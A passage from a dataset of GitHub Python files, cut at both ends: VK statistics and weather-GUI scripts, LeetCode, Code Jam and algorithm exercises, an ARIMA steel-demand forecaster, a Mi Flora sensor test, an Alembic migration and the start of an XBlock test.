message=title)\n","repo_name":"grigigo/webPython","sub_path":"lab1/papka/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4202053346","text":"#!/usr/env python3\n# -*- coding: utf-8\n\nimport re\n\n\"\"\"\n1956 books\n1213 about\n6451 polit\n6451 religion\n6451 inpr\n6451 pmain\n6451 lmain\n5488 relat\n13655 status\n\n\n\"\"\"\n\ndef getMainInLife(x):\n if x == 1:\n return 'семья и дети'\n elif x == 2:\n return 'карьера и деньги'\n elif x == 3:\n return 'развлечения и отдых'\n elif x == 4:\n return 'наука и исследования'\n elif x == 5:\n return 'совершенствование мира'\n elif x == 6:\n return 'саморазвитие'\n elif x == 7:\n return 'красота и искусство'\n elif x == 8:\n return 'слава и влияние'\n\ndef getMainInPeople(x):\n if x == 1:\n return 'ум и креативность'\n elif x == 2:\n return 'доброта и честность'\n elif x == 3:\n return 'красота и здоровье'\n elif x == 4:\n return 'власть и богатство'\n elif x == 5:\n return 'смелость и упорство'\n elif x == 6:\n return 'юмор и жизнелюбие'\n\n\ndef getRelation(x):\n if x == 1:\n return \"не женат/не замужем\"\n elif x == 2:\n return \"есть друг/есть подруга\"\n elif x == 3:\n return \"помолвлен/помолвлена\"\n elif x == 4:\n return \"женат/замужем\"\n elif x == 5:\n return \"всё сложно\"\n elif x == 6:\n return \"в активном поиске\"\n elif x == 7:\n return \"влюблён/влюблена\"\n elif x == 8:\n return \"в гражданском браке\"\n elif x == 0:\n return \"не указано\"\n\ndef main():\n file_name = 'books'\n file_namee = 'hr/books'\n f = open(file_name+\".txt\", \"r\")\n books = f.read().lower()\n #clear = books.replace(\"none\", \"\").split(',')\n clear = re.findall(r'\\w+\\w+\\w+\\w+', books)\n\n set_clear = set(clear)\n\n statistics = ''\n for i in set_clear:\n if i.strip(' []'):\n #k = int(i.strip(' ]['))\n s = \"%s: %d\\n\" % (i, clear.count(i))\n statistics += s\n\n f = open(file_namee+\".txt\", 'w')\n f.write(str(statistics))\n f = open(file_namee+\".txt\", 'r')\n s = f.read().strip().split('\\n')\n stat = []\n for i in s:\n buf = i.split(\":\")\n if buf:\n d = []\n d.append(buf[0])\n d.append(int(buf[1]))\n stat.append(d)\n stat.sort(key=lambda k: k[1], reverse=True)\n\n f = open(file_namee+\".txt\", 'w')\n for i in stat:\n f.write(str(i))\n f.write('\\n')\n \"\"\"\n set_info = set(info)\n\n statistics = ''\n for i in set_info:\n s = \"%s: %d\\n\" % (i, info.count(i))\n statistics += s\n\n f = open(\"books_statistics.txt\", 'w')\n f.write(str(statistics))\n \"\"\"\n\n \"\"\"\n f = open(\"name_statistics.txt\", 'r')\n s = f.read().strip().split('\\n')\n stat = []\n for i in s:\n buf = i.split(\":\")\n if buf:\n d = []\n d.append(buf[0])\n d.append(int(buf[1]))\n stat.append(d)\n stat.sort(key=lambda k: k[1], reverse=1)\n\n f = open(\"name_statistics_sorted.txt\", 'w')\n for i in stat:\n f.write(str(i))\n f.write('\\n')\n \"\"\"\n\nif __name__ == '__main__':\n main()\n","repo_name":"Vault-1814/py_projects","sub_path":"vkautomation/stats/analizator.py","file_name":"analizator.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9232269829","text":"import tkinter as tk\nfrom weatherApp import get_data\n\n\n\nclass HomePage():\n#creating window\n\n def __init__(self,master):\n\n self.master = master\n self.frame = tk.Frame(self.master)\n self.namePlace = tk.StringVar() \n self.label = tk.Label(master,text=\"Place name\")\n self.entry = tk.Entry(master,textvariable= self.namePlace)\n self.button = tk.Button(master,text=\"Submit\", command = lambda: self.display_data(self.dataDisplay,self.namePlace))\n self.dataDisplay = tk.Label(master,text=\"The result appear here\")\n self.label.pack()\n\n self.entry.pack()\n self.button.pack()\n self.dataDisplay.pack(pady=20)\n\n def display_data(self, dataDisplay,namePlace):\n\n data = get_data(namePlace) # Calling backend function to get data\n print(data)\n dataDisplay.config(text=data['cod']) # Update the label with the fetched data\n \ndef main():\n root=tk.Tk()\n app = HomePage(root)\n root.mainloop()\n \nif __name__ == \"__main__\":\n main()","repo_name":"alona26/Weather","sub_path":"mainGui.py","file_name":"mainGui.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19199196020","text":"class Solution:\n def reverseBits(self, n: int) -> int:\n if (n == 0): return 0\n \n result = 0\n for i in range(32):\n result <<= 1\n if ((n & 1) == 1): \n result+=1\n n >>= 1\n return result","repo_name":"GabrielPlayer/leetcode","sub_path":"Algorithm/I/Day14/190ReverseBits.py","file_name":"190ReverseBits.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37779136248","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom SteelDemandAnalysis.data_process.steel_demand_data import steel_demand_data_initial\nfrom SteelDemandAnalysis.model.ARIMA import x13_arima\n\n\ndef analysis_entry():\n steel_demand = steel_demand_data_initial.SteelDemand()\n steel_df = steel_demand.steel_demand_data()\n steel_series = steel_df[steel_df.columns[0]]\n # steel_series.index = pd.to_datetime(steel_series.index)\n steel_series.index = pd.DatetimeIndex(start='2006-01-01', periods=161, freq='M')\n steel_series.name = 'TimeSeries'\n return steel_series\n\n\ndef read_df():\n f = open('E:\\\\htsc\\\\行业景气度\\\\数据\\\\模型数据\\\\converted_model_data.dat')\n data_df = pd.read_csv(f, header=0, index_col=0)\n return data_df\n\n\ndef fun():\n model = x13_arima.X13Arima('E:\\\\htsc\\\\行业景气度\\\\X13_ARIMA\\\\WinX13\\\\x13as\\\\x13as.exe')\n data_series = analysis_entry()[12:]\n user_params = read_df()\n user_params.index = data_series.index\n data_series.name = 'a'\n res = []\n for period in range(-60, 0, 1):\n time_series = data_series[:period]\n exog_df = user_params[:period + 1] if period != -1 else user_params\n exog_df.name = 'b'\n exog_df.columns = ['b1', 'b2', 'b3', 'b4', 'b5', 'b6',\n 'b7', 'b8', 'b9', 'b10', 'b11', 'b12']\n model.x13_arima_analysis(time_series, exog=exog_df, forecast_periods=1)\n y_pre = model.x13_forecast()\n res.append(y_pre[0])\n for i, k in enumerate(res):\n print(k)\n\n\nif __name__ == '__main__':\n fun()\n","repo_name":"huomozhihen/steelAnalysis","sub_path":"SteelDemandAnalysis/model/ARIMA/x13_steelDemand_predict.py","file_name":"x13_steelDemand_predict.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71766804675","text":"# coding=utf-8\nimport argparse\nimport logging\nimport sys\n\nimport re\nfrom btlewrap import BluepyBackend\nfrom miflora import miflora_scanner\nfrom miflora.miflora_poller import MI_BATTERY\nfrom miflora.miflora_poller import MI_CONDUCTIVITY\nfrom miflora.miflora_poller import MI_LIGHT\nfrom miflora.miflora_poller import MI_MOISTURE\nfrom miflora.miflora_poller import MI_TEMPERATURE\nfrom miflora.miflora_poller import MiFloraPoller\n\nlogger = logging.getLogger(\"mycodo.inputs.miflora\")\n\n\ndef poll(args):\n \"\"\"Poll data from the sensor.\"\"\"\n poller = MiFloraPoller(args.mac, BluepyBackend)\n print(\"Getting data from Mi Flora\")\n print(\"FW: {}\".format(poller.firmware_version()))\n print(\"Name: {}\".format(poller.name()))\n print(\"Temperature: {}\".format(poller.parameter_value(MI_TEMPERATURE)))\n print(\"Moisture: {}\".format(poller.parameter_value(MI_MOISTURE)))\n print(\"Light: {}\".format(poller.parameter_value(MI_LIGHT)))\n print(\"Conductivity: {}\".format(poller.parameter_value(MI_CONDUCTIVITY)))\n print(\"Battery: {}\".format(poller.parameter_value(MI_BATTERY)))\n\ndef scan(args):\n \"\"\"Scan for sensors.\"\"\"\n print('Scanning for 10 seconds...')\n devices = miflora_scanner.scan(BluepyBackend, 10)\n print('Found {} devices:'.format(len(devices)))\n for device in devices:\n print(' {}'.format(device))\n\ndef valid_miflora_mac(mac, pat=re.compile(r\"C4:7C:8D:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}\")):\n \"\"\"Check for valid mac addresses.\"\"\"\n if not pat.match(mac.upper()):\n raise argparse.ArgumentTypeError('The MAC address \"{}\" seems to be in the wrong format'.format(mac))\n return mac\n\ndef main():\n \"\"\"Main function. Mostly parsing the command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--verbose', action='store_const', const=True)\n subparsers = parser.add_subparsers(help='sub-command help', )\n\n parser_poll = subparsers.add_parser('poll', help='poll data from a sensor')\n parser_poll.add_argument('mac', type=valid_miflora_mac)\n parser_poll.set_defaults(func=poll)\n\n parser_scan = subparsers.add_parser('scan', help='scan for devices')\n parser_scan.set_defaults(func=scan)\n\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n\n if not hasattr(args, \"func\"):\n parser.print_help()\n sys.exit(0)\n\n args.func(args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/tests/manual_tests/test_miflora.py","file_name":"test_miflora.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"}
+{"seq_id":"23600670921","text":"import string\r\n\r\nifile = open(\"A-large.in\")\r\ns = ifile.read().split(\"\\n\")\r\nifile.close()\r\n\r\nT = int(s[0])\r\n\r\nout = []\r\nfor i in range(1,T+1):\r\n N = int(s[i].split(\" \")[0])\r\n K = int(s[i].split(\" \")[1])\r\n\r\n if (K+1)%pow(2,N)==0:\r\n O = \"ON\"\r\n else:\r\n O = \"OFF\"\r\n \r\n out.append(\"Case #\"+str(i)+\": \"+O)\r\n\r\nofile = open(\"output.txt\",\"w\")\r\nofile.write(string.join(out,\"\\n\"))\r\nofile.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_53/372.py","file_name":"372.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13694807792","text":"from functools import cmp_to_key\nclass Solution:\n def largestNumber(self, nums: List[int]) -> str:\n def cmp(x, y):\n a, b = int(x+y), int(y+x)\n if a < b:\n return 1\n elif a > b:\n return -1\n else:\n return 0\n\n nums = sorted(map(str, nums), key=cmp_to_key(cmp))\n ans = ''.join(nums).lstrip('0')\n\n return ans if ans else '0'","repo_name":"pdkz/leetcode","sub_path":"0179_Largest_Number/0179_Largest_Number.py","file_name":"0179_Largest_Number.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23622774651","text":"def explode(s, c):\r\n t = []\r\n s += c;\r\n p = 0;\r\n for i in range(len(s)):\r\n if (s[i] == c or s[i] == \"\\n\") and s[p:i] != \"\" and s[p:i] != \"\\n\":\r\n t.append(s[p:i])\r\n p = i + 1\r\n return t\r\n\r\ndef isSorted(a):\r\n for i in range(1, len(a)):\r\n if a[i] < a[i-1]: return False\r\n return True\r\n\r\ndef findChain(aU, aS, dest, i):\r\n nextIndex = aS.index(aU[i])\r\n if dest == nextIndex: return [dest]\r\n return [nextIndex] + findChain(aU, aS, dest, nextIndex)\r\n\r\ndef rotateChain(aU, aS, dest, i):\r\n nextIndex = aS.index(aU[i])\r\n aU[i] = aS[i]\r\n if dest == nextIndex: return\r\n rotateChain(aU, aS, dest, nextIndex)\r\n\r\ndef solveCase(data):\r\n aU = explode(data, \" \")\r\n for i in range(len(aU)):\r\n aU[i] = int(aU[i])\r\n aS = []\r\n for i in aU: aS.append(i)\r\n aS.sort()\r\n i = -1\r\n n = len(aS)\r\n count = 0\r\n\r\n while i < n-1:\r\n i += 1\r\n if aU[i] == aS[i]: continue\r\n chain = findChain(aU, aS, i, i)\r\n rotateChain(aU, aS, i, i)\r\n if len(chain) > 1: count += len(chain)\r\n return \"%0.6f\" % count\r\n\r\ndef process(data):\r\n out = \"\"\r\n caseNum = 1\r\n for i in range(2, len(data), 2):\r\n if caseNum > 1: out += '\\n'\r\n out += \"Case #\" + str(caseNum) + \": \"\r\n out += solveCase(data[i])\r\n caseNum += 1\r\n return out\r\n\r\ndef main(fn):\r\n iFile = open(fn + \".in\", \"r\")\r\n oFile = open(fn + \".out\", \"w\")\r\n print(\"Files opened.\")\r\n\r\n data = []\r\n while True:\r\n line = iFile.readline()\r\n if not line: break\r\n data.append(line)\r\n\r\n out = process(data)\r\n print(\"Calculations complete. Outputting to file.\")\r\n oFile.writelines(out)\r\n print(\"Output complete.\")\r\n iFile.close()\r\n oFile.close()\r\n print(\"Files closed.\")\r\n\r\nmain(\"small\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_77/313.py","file_name":"313.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31376906781","text":"\"\"\"\nhttps://youtu.be/cswJ1h-How0\n# 9. 코딩테스트에서 자주 출제되는 기타 알고리즘.\n\n\"\"\"\nimport math\n\n\n# 복잡도: O(x)\ndef is_prime_number_old(x):\n for i in range(2, x):\n if x % i == 0:\n return False\n return True\n\n\n# 복잡도: O(sqrt(x))\ndef is_prime_number(x):\n for i in range(2, int(math.sqrt(x) + 1)):\n if x % i == 0:\n return False\n return True\n\n\n# 에라토스테라스의 체\ndef eratosteras(x):\n array = [True for i in range(x + 1)] # 1~x 소수 초기화.\n for i in range(2, int(math.sqrt(x) + 1)):\n if array[i] == True: # i 가 소수인경우.\n j = 2\n while i * j <= x: # i 배수는 모두 False처리.\n array[i * j] = False\n j += 1\n list = [] # 소수 idx 리스트.\n for idx in range(2, x + 1):\n if array[idx]:\n list.append(idx)\n return list\n","repo_name":"moneymashi/ThisIsCodeTestInPYTHON","sub_path":"FreqAskCodeTest/PrimeNumber.py","file_name":"PrimeNumber.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25476351438","text":"'''\n[Graduate Algorithm @galTech/ Ud401]\nweb page: https://gt-algorithms.com/\nContent: 1.DP: FIB, LIS, LCS\nAuthor: Rebecca\n'''\n\n#buttom-up DP version of fib\ndef fib(n):\n\td = [0,1]\n\tfor i in range(2,n):\n\t\td.append(d[i-1] + d[i-2])\n\treturn d[n-1]\n\n# ------------ simple test -------------\nprint(fib(2))\nprint(fib(10))\n# --------------------------------------\n\n\n#Longest Increasing Subsequence(LIS)\n# definition of Subsequence -- allow skip elements\ndef LIS(a:list):\n\tn = len(a)\n\tmax_l = 1\n\tlis = [1]*n\n\tfor i in range(1,n):\n\t\tfor j in range(0,i):\n\t\t\tif a[i]>a[j] and lis[i]< lis[j]+1:\n\t\t\t\tlis[i] = lis[j]+1\n\t\tif max_l0 and mat[0][j-1]>0):\n\t\t\tmat[0][j] = 1\n\t\t\t\n\tfor i in range(m):\n\t\tif a[i]==b[0] or (i>0 and mat[i-1][0]>0):\n\t\t\tmat[i][0] = 1\n\n\tfor i in range(1,m):\n\t\tfor j in range(1,n):\n\t\t\tif a[i]==b[j]:\n\t\t\t\tmat[i][j] = mat[i-1][j-1] + 1\n\t\t\telse:\n\t\t\t\tmat[i][j] = max(mat[i-1][j],mat[i][j-1])\n\t#print(mat)\n\treturn mat[m-1][n-1]#, mat\n\n# ------------ simple test -------------\na,b = 'bbb', 'bb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\na,b = 'bbb', 'bbbb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\na,b = 'Rebecca', 'bbba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\na,b = 'abba', 'aba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\n# --------------------------------------\n\n\n#LCS: longest common subsequence\n# space optimization: O(min(n,m))\ndef LCS_opt(a,b):\n\tm,n = len(a), len(b)\n\tif(m==0 or n==0):\n\t\treturn 0\n\tif(m0 and prev[j-1]>0):\n\t\t\tprev[j] = 1\n\tfor i in range(m):\n\t\tif a[i] == b[0] or prev[0]>0:\n\t\t\tcurr[0] = 1\n\t\tfor j in range(1,n):\n\t\t\tif a[i]==b[j]:\n\t\t\t\tcurr[j] = prev[j-1]+1\n\t\t\telse:\n\t\t\t\tcurr[j] = max(curr[j-1],prev[j])\n\t\tprev = curr\n\t\tcurr = [0]*n\n\treturn prev[-1]\n\n# ------------ simple test -------------\na,b = 'bbb', 'bb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\na,b = 'bbb', 'bbbb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\na,b = 'Rebecca', 'bbba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\na,b = 'abba', 'aba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\n# --------------------------------------","repo_name":"LeafyQ/Algorithm","sub_path":"Intro2GA/DP1.py","file_name":"DP1.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32700483564","text":"\"\"\"empty message\n\nRevision ID: 85646d10e7cd\nRevises: dbf33c92fd33\nCreate Date: 2020-12-13 19:30:36.072250\n\n\"\"\"\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = '85646d10e7cd'\ndown_revision = 'dbf33c92fd33'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.execute(\n 'ALTER TABLE direct_chat '\n 'RENAME CONSTRAINT fk_private_chat_chat_id '\n 'TO fk_direct_chat_chat_id'\n )\n\n\ndef downgrade():\n op.execute(\n 'ALTER TABLE direct_chat '\n 'RENAME CONSTRAINT fk_direct_chat_chat_id '\n 'TO fk_private_chat_chat_id'\n )\n","repo_name":"Kamide/citychat","sub_path":"server/migrations/versions/85646d10e7cd_.py","file_name":"85646d10e7cd_.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16577476286","text":"import json\n\nfrom webob import Request\nfrom mock import Mock\n\nfrom workbench.runtime import WorkbenchRuntime\nfrom xblock.runtime import KvsFieldData, DictKeyValueStore\n\nfrom google_drive import GoogleDocumentBlock, GoogleCalendarBlock\n\nfrom nose.tools import (\n assert_equals\n)\n\ndef make_request(body, method='POST'):\n request = Request.blank('/')\n request.method = 'POST'\n request.body = body.encode('utf-8')\n request.method = method\n return request\n\ndef make_document_block():\n runtime = WorkbenchRuntime()\n key_store = DictKeyValueStore()\n db_model = KvsFieldData(key_store)\n return GoogleDocumentBlock(runtime, db_model, Mock())\n\ndef make_calendar_block():\n runtime = WorkbenchRuntime()\n key_store = DictKeyValueStore()\n db_model = KvsFieldData(key_store)\n return GoogleCalendarBlock(runtime, db_model, Mock())\n\ndef test_studio_document_submit():\n block = make_document_block()\n\n body = json.dumps({\n 'display_name': \"Google Document\",\n 'embed_code': \"